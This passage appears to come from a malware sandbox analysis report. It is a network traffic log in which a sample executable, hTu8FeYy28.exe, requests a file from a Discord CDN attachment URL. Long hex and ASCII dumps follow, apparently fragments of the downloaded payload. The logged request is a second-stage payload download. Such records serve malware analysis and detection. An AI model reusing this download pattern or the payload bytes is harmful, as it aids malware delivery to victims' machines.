&r4voB7mx2QC~b!ErX>n8tE.bzxIf}AzM)T1geXz<e,~,WI)"lWy1;s'd2\m~&#C>JEC0=+Q96v_.'L<gwUGJF6v&kgy\1^[K
2021-10-08 15:51:51 UTC	30	IN	Data Raw: 23 fa 27 ee 3a 7e cc a9 e4 e3 50 4c 49 74 e9 03 79 0c d7 07 63 03 79 77 51 0f 5a 34 71 21 a6 71 66 a3 fe 2f 85 85 b7 6a f6 9c 0f 68 f1 27 92 2b 9d 60 9c e5 5c 2b 9d c9 19 a7 d7 4b fa 9f c4 9d 8f 9d 80 0a e2 3b ec f3 b1 e8 cb 2e 0a 0a e0 07 6b 99 88 a3 f0 a6 6f 98 09 f3 b4 ed ba 03 76 94 13 2f 8c 55 28 3d e1 93 9e 86 31 04 f6 ac 5a c6 9b ea c1 52 b2 54 b7 06 ec c8 9f ef bc ae 50 98 0b 78 de cb 16 f0 3f d9 78 1a 33 34 75 d4 f4 95 9b c2 af 98 04 a3 fa 7b 5b d9 79 99 83 6b 71 8e 2d 04 f9 1e 3b 9c 0b 29 9e 02 fc 1f a6 5e 92 c9 1c c5 2a 96 1b 2b 98 bf 24 98 06 ac 56 f4 25 d0 8f d5 73 78 d3 5b 15 6c fd 50 b2 9f f0 d3 75 94 1d 4d cb 91 96 98 07 e6 db fc 10 74 e8 7b 59 57 23 a7 e3 6f 63 e6 dc 1a 37 0b 53 96 1d 0a ee 7a d8 db 67 30 0b 92 17 95 9e 21 a7 8c 24 4a 45 Data Ascii: #':~PLItycywQZ4q!qf/jh'+`\+K;.kov/U(=1ZRTPx?x34u{[ykq-;)^*+$V%sx[lPuMt{YW#oc7Szg0!$JE
2021-10-08 15:51:51 UTC	32	IN	Data Raw: 28 26 21 95 ac 22 72 bf 70 a0 35 a0 0b 14 94 44 1b e9 30 39 ce b5 f9 cc f3 cf 43 83 c7 24 1c 09 34 24 72 91 f2 4f 77 01 0f 69 42 64 b6 1f d9 2b cc d5 34 2a 7e 80 97 d4 b1 9d ca e8 80 9c 7a eb 7b 6d 4c 3d ac 02 a7 a5 bd 4a 12 85 e4 ae 1c 6c 8e 1b 86 08 98 56 f7 f9 ec ae 0d 00 b7 b8 eb 08 b0 29 dc b2 35 c5 1f 90 44 08 bc f8 72 8c 73 3e 35 86 7c 99 cd 76 95 c9 6e ce b5 f9 9c 7c 83 e5 18 8a 73 33 b2 06 a0 07 33 ac 0a 9b ce d0 fd a6 55 12 f1 c8 c2 f5 f2 42 0c 96 4f 53 61 43 93 e1 17 18 b8 80 f9 9c 3d aa 31 c9 5b 65 4c 0f 08 95 d8 a8 1d 8b 94 29 a8 3f b0 04 9b d6 a9 bf 7e b8 f4 75 18 ff ab e1 63 72 b7 98 5d 6c ac 0f 08 ba ea b4 02 af ad e6 ef 84 03 0d 00 a8 3b 9d da be e7 37 af 86 7d 16 95 e1 17 18 b8 80 f9 9c 3d 99 d0 d6 ac 0d 04 87 ef e8 81 18 90 6d 38 29 ef Data Ascii: (&!"rp5D09C$4$rOwiBd+4*~z{mL=JlV)5Drs>5\|vn\|s33UBOSaC=1[eL)?~ucr]l;7}=m8)
2021-10-08 15:51:51 UTC	33	IN	Data Raw: b3 98 47 a2 4b fa 1f 90 45 87 e3 21 f3 c1 72 b6 3e 2e 51 5b 20 12 f1 89 fd c3 6e a0 2f d9 1f f5 ff c2 de af 8f ce b5 f9 9c 3d aa 3b a7 bb 6e 88 63 5c ca df 2e 51 6b 3f 98 57 72 b4 12 9f a5 ba eb 2e 34 42 64 d3 2d db 12 94 5d 4c 0e b0 6d 4c 7c 83 f3 eb 18 90 52 db 20 7b 15 3d d8 cd 33 a5 a1 a6 39 8d fd c8 ce f3 8e 1b 86 08 98 56 f8 73 1c 7d 01 3a 38 0a b9 6c a0 00 c5 1f 90 59 69 23 eb 19 e8 b8 e5 09 29 ee 02 ca ab a0 23 f7 f1 c5 7b 03 2d df 33 af a9 a8 3f 9a 38 4c 7c f0 75 30 4b 88 48 07 25 ff e7 05 34 05 51 08 d9 4f 42 0b 06 ba cc d5 2a 4b 99 da 9e 35 a0 01 48 73 5a 9e 00 a0 2b cc fe 4d 93 ce f3 eb 17 08 bd 63 7e 80 9c 7a eb 7b 6d 4c 3d bd 60 c8 c9 48 3b b6 17 08 bd 63 7e 80 9c 7a eb 7b 6d 4c 0f 1a 61 5d 41 86 49 96 41 90 70 a7 b2 35 c5 1f 90 61 40 39 a0 Data Ascii: GKE!r>.Q[ n/=;nc\.Qk?Wr.4Bd-]LmL\|R {=39Vs}:8lYi#)#{-3?8L\|u0KH%4QOB*K5HsZ+Mc~z{mL=`H;c~z{mLa]AIAp5a@9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49822	162.159.130.233	443	C:\Users\user\Desktop\hTu8FeYy28.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 15:51:51 UTC	34	OUT	GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache
2021-10-08 15:51:51 UTC	35	IN	HTTP/1.1 200 OK Date: Fri, 08 Oct 2021 15:51:51 GMT Content-Type: application/octet-stream Content-Length: 128000 Connection: close CF-Ray: 69b088711ba15b44-FRA Accept-Ranges: bytes Age: 17634 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Lnouxqkbbgkvxwmwtigvjxpvnenadlc ETag: "f82884cc5e7cf22e9702adbfc1f12bee" Expires: Sat, 08 Oct 2022 15:51:51 GMT Last-Modified: Fri, 08 Oct 2021 10:04:29 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1633687469505069 x-goog-hash: crc32c=JdV9Ug== x-goog-hash: md5=+CiEzF588i6XAq2/wfEr7g== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 128000 X-GUploader-UploadID: ADPycds0RnBpdJc_kVb2ENhqI_yORFMxXLMJ15oMSy2oDomj2hdfbHrpnzEnkEQU2Z1XjrrhjyYlI7T2bH5p-XkQ2X4 X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-10-08 15:51:51 UTC	36	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 6d 63 4c 30 56 74 49 78 4a 47 25 32 46 5a 6e 36 45 6e 75 6f 31 57 43 4a 41 47 6e 25 32 46 38 49 66 78 48 46 35 53 49 7a 7a 77 44 71 43 33 48 73 52 4b 50 4f 63 4b 4d 6d 44 5a 74 6d 47 7a 5a 56 77 62 61 4f 41 34 32 43 78 31 67 39 36 36 57 45 63 25 32 42 6b 33 44 77 6a 51 58 74 6e 4a 25 32 42 38 25 32 42 48 70 41 44 49 52 64 57 64 35 43 4f 69 72 61 69 42 78 25 32 46 6f 76 57 44 25 32 46 58 35 33 4e 5a 45 51 66 6b 59 67 7a 69 4f 73 6e 65 59 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mcL0VtIxJG%2FZn6Enuo1WCJAGn%2F8IfxHF5SIzzwDqC3HsRKPOcKMmDZtmGzZVwbaOA42Cx1g966WEc%2Bk3DwjQXtnJ%2B8%2BHpADIRdWd5COiraiBx%2FovWD%2FX53NZEQfkYgziOsneYA%3D%3D"}],"group":"cf-nel","m
2021-10-08 15:51:51 UTC	36	IN	Data Raw: 05 15 39 9e 06 9a 71 11 2a 6b 17 25 c6 e5 22 5e e3 23 d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ab b1 8c 76 80 96 7e a6 06 b2 16 a8 09 34 10 dc e7 29 ff f2 59 34 16 a9 8e 74 f9 ac 53 7b 3f b2 22 32 14 91 cd 67 65 6f 09 34 12 a3 9e 27 c7 76 b2 1d d9 7f 47 a8 0d 3c 03 63 67 6e 9c 52 ae 58 a9 aa 0c 8d c9 0c c8 c3 75 0b 38 1b df 31 eb 29 fb c7 40 0d 36 28 74 ec cd 6b 10 b5 ac 4c 28 75 0d 0a f8 2a 1a 72 8a 7e a4 75 75 3b bc de 83 d7 12 91 cd 63 61 7c 96 4a 25 cd 5c f1 b9 32 66 ec a4 05 7e a0 15 2a 45 ce 85 b5 8f cf 58 c9 0c c8 c3 75 0b 38 1b df 31 eb 29 fb c7 40 0d 36 28 74 ec cd 6b 10 b5 ac 4c 28 75 0d 0a f8 2a 1a 72 8a 7e a4 75 75 3b bc de 83 d7 12 91 Data Ascii: 9qk%"^#T4o$XmL5856Mv~4)Y4tS{?"2geo4'vG<cgnRXu81)@6(tkL(ur~uu;ca\|J%\2f~EXu81)@6(tkL(u*r~uu;
2021-10-08 15:51:51 UTC	37	IN	Data Raw: 65 1f ec 8a 21 bf 33 eb 02 fa 3c 79 4d 90 06 ff d3 3c 71 7d 03 31 c5 6f 74 fe 04 b5 d5 76 ce c9 05 2f 86 71 2f 90 0c c9 19 fd dd 72 a8 2d 95 d0 cd 03 66 99 9e 38 7c d3 6e eb 14 d3 6a bc f7 bf 39 bf 6c b7 8e 51 cc 1f 56 3b ad ff e8 95 c1 26 5b 01 6e a7 8d a9 06 8b bb cd bb 71 94 1d a9 f6 37 8d ad 2c 42 47 94 49 d3 02 c4 80 97 e4 9b 88 70 48 67 f8 7b 04 e3 95 d5 2d eb 05 7e 6e c2 61 4e db 64 6c 96 8c 79 4c 0d 0e 8f ad f8 f3 ec 97 81 b9 53 a9 ac 1e 70 b4 18 d8 dd cb 78 8b e4 2c a6 7e d5 38 11 30 45 f7 3b b6 11 14 35 66 97 c2 b2 1e 57 67 32 b8 d3 29 98 fd fa b9 78 95 d9 11 3a 3e 48 5c 83 ee 25 b9 0a a4 2d 29 6e d5 76 ed fe 4e df 22 54 6d 29 c2 f1 af c1 9c 25 a0 15 22 67 0f 92 1f f8 47 da f3 fe 7a b6 29 87 99 e9 1a 5e df 66 40 06 b6 15 06 bb 70 b4 2f df 72 c0 Data Ascii: e!3<yM<q}1otv/q/r-f8\|nj9lQV;&[nq7,BGIpHg{-~naNdlyLSpx,~80E;5fWg2)x:>H\%-)nvN"Tm)%"gGz)^f@p/r
2021-10-08 15:51:51 UTC	39	IN	Data Raw: 6d 45 c8 65 81 1b 9c 44 af 49 91 b7 d2 69 f5 f6 14 9a e0 43 87 9f e7 44 39 a1 ed c7 4f 6b 77 3a f0 0e 23 f9 0e b9 a3 b0 07 cc fa 60 9f 5e 9b 61 9f fd 85 fc 68 a9 85 b5 2a 9f f8 1e 73 6e b7 83 cc ea a5 ae a9 7e f0 2d 6f 91 d5 76 cb 3a 37 87 bd 65 43 f8 09 28 c5 7e 9b a9 b9 4a b4 c1 76 f9 f6 c3 a9 8f 89 ef c1 4a f6 01 15 be 23 f3 9f c2 58 2d d6 c2 8e c0 26 74 c8 eb 42 3f 58 8d df 8d 35 9e 5f 5f ee b4 1a 18 db 97 06 8e 03 3a 87 39 af fe 0e 27 00 93 b2 23 ae b0 fc 03 0b 1b ae 19 de b3 d3 87 02 df 33 d4 1b b2 5d 5d 50 d2 df 78 37 43 e2 a3 df 37 f2 71 7e 8e 3b 8a 6b 97 2e 20 3c 48 7f 30 43 c7 58 c0 c9 19 47 7c e0 9b d2 87 0a 88 92 1c 95 e8 2b 0d 29 98 4d ce e6 b5 81 bf bf 29 8c d3 82 8e 3f ff b5 a8 64 81 19 b1 fe 34 3f 2e 6b 6b 59 71 6e 0e 53 54 85 d4 18 4a 11 Data Ascii: mEeDIiCD9Okw:#`^ah*sn~-ov:7eC(~JvJ#X-&tB?X5__:9'#3]]Px7C7q~;k. <H0CXG\|+)M)?d4?.kkYqnSTJ
2021-10-08 15:51:51 UTC	40	IN	Data Raw: 59 72 14 b8 f5 ad af ca 87 8d fe 32 e5 22 3b f1 ff f9 c2 bd c7 b1 ff f8 11 33 8c 64 90 08 86 59 39 1e 86 19 84 4b 81 1c 74 af d8 a4 03 60 63 b4 b0 c4 8c 3c 8b e2 3d 4d 97 de 55 3f e5 db ff 83 a5 bd 9f 6e 96 40 78 46 3b af 97 de 1d 08 6a 4c 51 27 93 61 b4 72 dd 6d 35 ab ca db 11 05 3d f3 5a 0e 3a f9 9f b2 be e1 ac f4 78 9c bc a9 e2 58 08 b6 06 f3 1f fa 4f 6e be 2a 0f 59 62 9a f2 80 5c e6 97 9e 3b 13 e6 ff ab a6 2e 61 03 67 09 0d 0e 90 ea 79 b2 cd 32 48 b4 08 18 62 d3 33 56 e3 2b 12 2e 42 1a 74 49 04 ac 0a f1 21 1c 71 7e 89 45 73 f9 02 e4 c6 8d 5f a6 44 72 ea d0 ec 85 f6 56 b4 2c 56 5e 2d 67 8c 1d f7 57 3e 81 f7 f8 36 d6 b0 50 3d 98 10 96 02 53 3f 8f c4 e3 cf e4 94 0c c9 e6 62 14 ab d1 53 75 82 73 59 1e 4c 5d 7a 91 d1 76 bf 45 84 c3 98 f1 22 0a a3 1a 34 98 Data Ascii: Yr2";3dY9Kt`c<=MU?n@xF;jLQ'arm5=Z:xXOn*Yb\;.agy2Hb3V+.BtI!q~Es_DrV,V^-gW>6P=S?bSusYL]zvE"4
2021-10-08 15:51:51 UTC	41	IN	Data Raw: 49 c4 b8 f0 77 0a 8b bc b5 f2 21 fa 68 8f c4 f4 3c 79 1c c1 4f 6e fe 1f e9 0b 3d 82 a3 b1 be 14 41 96 f5 16 82 be b7 c8 30 0d 05 f9 d4 e5 40 04 95 cb 53 d0 2d bb 5f 12 f5 fc 05 3e 13 2a 77 4b 22 b4 b2 5d 24 34 0c c9 59 2b c6 ce 9e 95 14 28 91 a1 ee 40 7e 84 55 4f 51 27 85 a9 0c b8 e7 0c d5 84 8b eb f9 a0 80 5c 75 e0 92 61 67 0b d3 c7 8a 6b 3e 48 1a 6e 93 db 5d 0e e3 10 c4 ba ed dd 0e c5 33 e2 8c 44 37 ef e7 9d 94 51 75 43 d6 cf 4a 0a f6 67 62 e8 8e a8 24 bc f1 a2 91 af 48 d0 64 9d 93 88 5f 83 4d 93 dc 0a 50 ac b0 1e 22 3c 2f f7 bc fe 6d 2c 7c db 8e 1a 2e f0 7a bf 20 16 ab 27 f5 30 12 82 83 eb 22 69 6d 4c 02 0a 5c 6e 9c 88 d4 51 a1 d7 e0 9b c2 52 56 b2 11 de d4 f2 ae 1c f0 2c e0 79 20 cf a0 62 73 d2 cf 13 51 c4 52 20 6f b7 7d be ec 56 b8 72 43 30 9b c2 9e Data Ascii: Iw!h<yOn=A0@S-_>*wK"]$4Y+(@~UOQ'\uagk>Hn]3D7QuCJgb$Hd_MP"</m,\|.z '0"imL\nQRV,y bsQR o}VrC0
2021-10-08 15:51:51 UTC	43	IN	Data Raw: 3a 47 8e 23 e0 a1 ef bc a1 da ae 60 87 89 f8 0d 19 9f f4 23 bb 15 01 5a bd 04 ea a5 f4 70 ab b1 c8 c9 58 da ac 39 ea 96 02 cf 1b b1 c0 89 a3 9b 8a 52 f1 93 8b 8a 21 c4 e6 f7 e8 b1 c8 db 23 a9 f6 c1 3d a7 e7 0e c8 70 bc c7 0f 3f a0 11 46 02 b7 ad 96 70 f1 94 53 6f 60 98 4f 3c 28 32 47 bd 2a 7f 5c e1 1f c2 b3 f1 fe 44 15 4d cf 38 6e 91 db 62 92 39 eb 7a cd ea 80 b3 d3 28 57 14 8b 80 dd 12 dd 6f 7c c0 bc f6 39 05 61 4f 79 6a e8 a7 e7 34 39 f3 fe e6 c8 ec 8a 06 fe fc 0f 36 77 05 7e cb 41 33 eb 2b d0 dd 71 40 22 12 81 ac 41 f9 e6 37 fa 3f a1 c7 5a 44 10 e7 57 1a 2f d2 c3 59 30 39 b9 65 44 0a ed 9d 9d af 93 92 06 fb 84 6c ef 9d c7 21 b2 4e f0 5a e0 ef a0 19 ad e8 d8 c4 b2 37 e6 bd 3c 49 8f a1 e5 33 f0 0b 1b e3 17 7a cc aa 29 bd 26 25 b5 ab d1 25 b1 d2 d0 a6 7e Data Ascii: :G#`#ZpX9R!#=p?FpSo`O<(2G*\DM8nb9z(Wo\|9aOyj496w~A3+q@"A7?ZDW/Y09eDl!NZ7<I3z)&%%~
2021-10-08 15:51:51 UTC	44	IN	Data Raw: 64 94 3b aa 69 61 19 a4 08 ff b8 f8 1b a1 d2 ce e0 9e 08 fd cd 1f c4 b1 e7 5e a0 6a ba b5 80 83 cf 1b 58 a9 8c 6d 7e 84 50 a1 80 8e c2 b2 19 aa 5e 97 ec d2 e7 1e 4d d4 95 d1 70 fb b5 84 56 e4 d6 ea f5 e9 12 c1 77 18 e5 12 b4 0f 5f 0c 3c 7d 46 12 f1 a2 42 13 4f 7f 17 4d ac 41 ed f9 d8 ee 67 18 a4 76 ca d3 3c 71 03 3d 91 dc be aa 15 54 93 8b d0 95 b6 57 23 a9 c3 60 bc a6 03 7c c6 d9 77 14 a3 ea a7 a0 26 0b 59 30 3f ed ee 2d cd 5c b3 df 52 f6 0f 41 ec 80 fe 58 c2 ba e0 9a 52 bb dd 25 c1 68 85 fc 27 85 da f9 d9 33 bb 2c 5f 5d 1e 71 5d 15 6d 6e d6 b1 f0 24 0e c2 b8 a6 4c 04 99 92 3d a9 8d e7 2c 0b 0e cb 7e d8 da fd e4 c6 ae 58 9e 3b cd 1f 84 33 85 fe 4a 07 54 a8 58 ee 15 52 ec d6 cc 80 e1 4c 60 c3 05 7a e7 0c 85 ad ba f8 5d 55 7e d6 a1 b3 fa 2f a1 b5 98 4d c7 Data Ascii: d;ia^jXm~P^MpVw_<}FBOMAgv<q=TW#`\|w&Y0?-\RAXR%h'3,_]q]mn$L=,~X;3JTXRL`z]U~/M
2021-10-08 15:51:51 UTC	45	IN	Data Raw: 0b 5c 8f 81 50 b0 42 18 d3 3f ed da 8b c7 08 ef e4 81 07 e4 b0 05 76 0c b4 2b 87 9c 5b 4a 47 a2 2f e2 8a bc ef e3 1a a2 2d d0 c7 e3 3d 89 ad 15 22 4e b1 a0 66 e2 9b b2 28 4f 25 9c 62 ec 81 0f 00 9a 4f 95 f7 f0 37 23 f5 c9 50 e3 0a 83 a5 ba ec a7 af a8 3f 88 7c 26 72 87 ae d9 10 85 a9 ec d2 c3 36 27 05 9f 82 d8 e1 48 43 c9 52 a0 36 b3 d3 3d af f2 57 35 ee 0f 6b 64 99 90 4f 25 b5 9f 73 88 37 bb 7a 95 dc a7 f5 bf 6b 6b 77 4b 86 24 62 81 05 2b 8b b8 ab b5 9b 82 21 e5 45 cc cc 12 81 56 b6 13 72 ee 07 43 ef 86 1c 22 6f 2d 95 84 51 75 21 b5 dd 7b 41 b5 e4 df 6f 56 a2 59 79 11 14 d3 6d 26 4c 00 be ec db 23 be d3 44 5c 9b a0 73 23 a9 c9 73 7f 18 16 d1 44 14 91 b8 ca ea fc 5b 2e 30 37 d4 f2 3f ea 84 2f c8 eb 16 80 df 5c 88 3d a4 0e fb ea bf 0c a6 40 00 ef a6 7e 8d Data Ascii: \PB?v+[JG/-="Nf(O%bO7#P?\|&r6'HCR6=W5kdO%s7zkkwK$b+!EVrC"o-Qu!{AoVYym&L#D\s#sD[.07?/\=@~
2021-10-08 15:51:51 UTC	47	IN	Data Raw: f5 c9 a5 b9 98 62 00 a7 7d 2d 98 56 cb 48 53 55 c0 f1 bb 51 33 ad eb 2d 6a 93 6f 37 51 59 93 c2 20 41 44 3c 74 8d c7 48 28 47 a4 04 8b f5 9f e4 3c 02 11 08 26 49 18 ae 8d f0 88 66 17 11 ca fb df 33 b2 16 dd 3e 47 a3 9c 66 77 3f d0 e2 3e 01 9e 16 00 ae ea a3 79 3f aa 34 37 ac 38 6c ac 0e a7 89 89 d4 05 09 b0 3a d5 23 28 7d 04 a5 a4 01 7f 1d d3 22 7e a7 91 cf 0d 3c 5b 47 3c 3f 18 91 42 44 8c 48 f9 fb 0b 3e e1 0f 45 83 a9 86 41 b6 15 15 2a 7f 4b da d5 16 ea 94 e9 27 66 de 30 53 f0 51 91 fc b5 a7 65 61 92 7b 10 b6 54 e8 fd f1 e0 bb 00 ab 29 c9 c7 70 28 4c 9a 61 b2 2a bd 57 a5 8e 3f bf 3f 8a 54 e4 e8 a0 a0 2d 54 ed 61 7d 91 ca 30 65 b0 03 ca c7 9c 5a 35 93 07 01 78 d8 b6 50 dd 2e 13 0f 1c 64 c1 49 ba df 5e c5 47 94 45 88 d0 ed c9 4f 01 1a de 86 b9 63 39 a4 99 Data Ascii: b}-VHSUQ3-jo7QY AD<tH(G<&If3>Gfw?>y?478l:#(}"~<[G<?BDH>EAK'f0SQea{T)p(LaW??T-Ta}0eZ5xP.dI^GEOc9
2021-10-08 15:51:51 UTC	48	IN	Data Raw: 3c 71 7d 03 31 c5 6f 74 fe 04 b5 d5 76 ce c9 05 2f 86 71 2f 90 0c c9 19 fd dd 72 a8 2d 95 d0 cd 03 66 99 9e 38 7c d3 6e eb 14 d3 6a bc f7 bf 39 bf 6c b7 8e 3f ff 87 f0 2b 9d 90 5c 8f e3 57 6e b4 50 aa 75 6f 2c 54 a4 20 65 1f ec 8a 21 bf 33 eb 02 fa 3c 79 4d 90 06 ff d3 3c 71 7d 03 31 c5 6f 74 fe 04 b5 d5 76 ce c9 05 2f 86 71 2f 90 0c c9 19 fd dd 72 a8 2d 95 d0 cd 03 66 99 9e 38 7c d3 6e eb 14 d3 6a bc f7 bf 39 bf 6c b7 8e 3f ff 87 f0 2b 9d 90 5c 8f e3 57 6e b4 50 aa 75 6f 2c 54 a4 20 65 1f ec 8a 21 bf 33 eb 02 fa 3c 79 4d 90 06 ff d3 3c 71 7d 03 31 c5 6f 74 fe 04 b5 d5 76 ce c9 05 2f 86 71 2f 90 0c c9 19 fd dd 72 a8 2d 95 d0 cd 03 66 99 9e 38 7c d3 6e eb 14 d3 6a bc f7 bf 39 bf 6c b7 8e 3f ff 87 f0 2b 9d 90 5c 8f e3 57 6e b4 50 aa 75 6f 2c 54 a4 20 65 1f Data Ascii: <q}1otv/q/r-f8\|nj9l?+\WnPuo,T e!3<yM<q}1otv/q/r-f8\|nj9l?+\WnPuo,T e!3<yM<q}1otv/q/r-f8\|nj9l?+\WnPuo,T e
2021-10-08 15:51:51 UTC	49	IN	Data Raw: 06 d4 ae 68 b5 f9 f2 0c c2 98 57 17 14 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f7 98 5f 2a 46 6e bb 07 30 39 ee 02 a1 c9 5a 9e 28 26 65 38 45 eb 1e 0d 09 5b 49 f5 f5 93 87 8a 77 64 d9 4f 23 99 d1 3c 38 4c 19 81 5c a3 a9 dc b9 02 a5 d2 c6 a2 2e 34 20 12 d1 3c 32 3e 3b d3 24 1c 5b 20 05 51 6c c9 4c 7c 99 b5 97 b1 8a 11 0a dd 79 68 b3 f4 63 33 a5 d2 dc d7 28 26 40 5f 0a dd 3c 56 f8 1a 6d 4c 3a 51 1a 04 bc 8a 74 dc bb 07 3f dd 3f dd 79 68 ae 68 a5 d2 cf 37 a5 d2 9f c4 e4 ea 96 2e 55 12 9c 3d f8 1a 6b 47 9f c4 c9 29 bb 07 33 c0 fe 28 47 f0 69 42 01 48 1f 90 49 f5 f5 93 87 8a 75 5f 43 e6 83 80 98 33 b6 7b 03 4c 35 c5 0f 69 26 21 fb a1 bc 8a 7e f4 76 e1 43 e6 9b ba ea f8 74 dc f7 98 56 94 45 eb 12 f1 cf 37 c4 9d db 54 aa 5e 87 8a 63 33 af ea 8a 11 1c 09 3e 5a be 8e 54 Data Ascii: hWtA_*Fn09Z(&e8E[IwdO#<8L\.4 <2>;$[ QlL\|yhc3(&@_<VmL:Qt??yhh7.U=kG)3(GiBHIu_C3{L5i&!~vCtVE7T^c3>ZT
2021-10-08 15:51:51 UTC	51	IN	Data Raw: ba ec fd d2 bf 63 33 a5 d2 cc b0 1e 0d 24 1c 19 81 04 cf 12 f1 a9 dc b9 02 a5 d2 d6 c8 d3 41 92 25 fb a1 aa 5e df 5e c2 98 13 73 36 47 91 a2 25 9e 33 c0 f6 15 0c e2 9d bf 54 8f 88 0d 17 7d 1d 8b e6 ef f6 15 1d 8b b4 76 95 ac 0d 65 59 1b ef 84 71 55 73 5a e8 f4 30 39 aa 5e c2 98 47 f0 64 b6 1e 0d 15 78 9e 41 87 8a 7f 77 31 bb 1f 90 44 69 27 a3 b9 02 b8 80 96 2e 44 69 32 3e 2f b6 08 d9 6f 50 f2 0c 8d 99 db 54 af ea 96 2e 5b 20 7b 6d 38 4c 1d 8b e6 ef e1 63 43 e6 a0 46 79 68 a5 d2 cf 37 b3 f4 64 b6 5b 20 66 bb 69 42 05 51 61 2f c4 9d de db 22 17 5d 25 fa 1f f9 9c 51 08 b8 80 8f 9d d1 3c 1f 90 34 42 10 ec 93 a7 b2 72 b5 f9 e9 76 86 08 ab e1 02 ca 8b 94 4d ff c2 98 5f 2a 4b fa 69 42 0a dd 10 ec ed 80 8e 1b e9 76 8d 99 d3 41 90 20 77 64 c0 93 c8 a7 f7 98 47 f0 Data Ascii: c3$A%^^s6G%3T}veYqUsZ09^GdxAw1Di'.Di2>/oPT.[ {m8LcCFyh7d[ fiBQa/"]%Q<4BrvM_*KiBvA wdG
2021-10-08 15:51:51 UTC	52	IN	Data Raw: 16 fa 7a eb 19 81 13 73 2e 34 21 95 e3 67 3a 51 7a eb 1e 0d 07 56 f9 9c 58 99 c1 16 8a 11 0b 60 ff ab e8 f4 64 b6 08 d9 3a 51 6f 50 f3 8e 5a 9e 47 f0 7e f4 7c f0 72 d8 87 8a 15 78 83 80 97 b1 9a 38 06 d4 c7 24 65 38 2d b2 3f dd 5a 9e 2d b2 1b 86 7a eb 0b 60 ed 80 fc 24 74 dc b4 76 93 a7 b6 7b 20 12 f4 10 95 ac 11 6e af ea 8d 99 c7 24 7e f4 75 5f 6c c9 21 95 d5 46 1c 09 3a 51 7d 72 b6 7b 0c e2 af ea ff ab 82 fe 4d ff ef 84 00 c5 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 74 dc a2 4b 96 2e 55 12 87 8a 31 bb 7e f4 64 b6 09 5b 45 eb 0b 60 c3 1a 76 e1 13 73 7a eb 1f 90 49 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f4 10 9f c4 b8 80 d9 4f 2d b2 50 86 7b 6d 69 42 46 6e ee 02 af ea 94 29 c1 16 9c 3d f8 1a 6a c4 f8 Data Ascii: zs.4!g:QzVX`d:QoPZG~\|rx8$e8-?Z-z`$tv{ n$~u_l!F:Q}r{M n=3K tK.U1~d[E`vszItAO-P{miBFn)=j
2021-10-08 15:51:51 UTC	53	IN	Data Raw: a7 d7 4b fa 1f 90 20 12 f0 b7 fe 28 26 21 95 ad e6 ef 84 03 4c 78 e6 ef 84 03 4c 7c f0 07 56 94 28 86 08 d9 4f 03 4c 7d 72 d8 cd 33 c0 97 b1 ef 84 03 4c 7c f0 07 56 94 28 b6 7b 6d 4c 7c f0 06 d4 c3 1a 04 cf 33 c0 93 a7 d7 4b fa 1f 90 20 12 f0 87 8a 11 6e ce b5 f8 1a 04 cf 37 ca af ea f8 1a 04 cf 37 ca ab 61 2f b7 96 ae 68 c2 de 5b 20 13 23 19 81 7e da 52 8b 95 94 a9 dc d5 66 bb 07 56 97 b1 ef 84 07 56 94 29 a8 5a 9e 41 e2 65 38 4d df 5e a7 c7 24 9c 3d d9 47 f0 07 59 e4 6a c4 9d 4f 03 4c 73 a4 d0 ba 85 5d 25 9e 4e 7c 70 d3 41 22 17 7d 7d 8e 9b ba 85 2d b2 72 d7 b0 ed 80 f9 0c e2 e5 63 c9 29 af ea f8 1a 04 cf 33 c0 93 a7 d7 4b fa 1f 90 a0 46 6e a6 55 12 f1 83 00 c5 1f b0 6d 4c 7c f6 15 7a eb 7b 6d 4c 7c f4 10 ec fd a6 55 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c Data Ascii: K (&!LxL\|V(OL}r3L\|V({mL\|3K n77a/h[ #~RfVV)ZAe8M^$=GYjOLs]%N\|pA"}}-rc)3KFnUmL\|z{mL\|Un
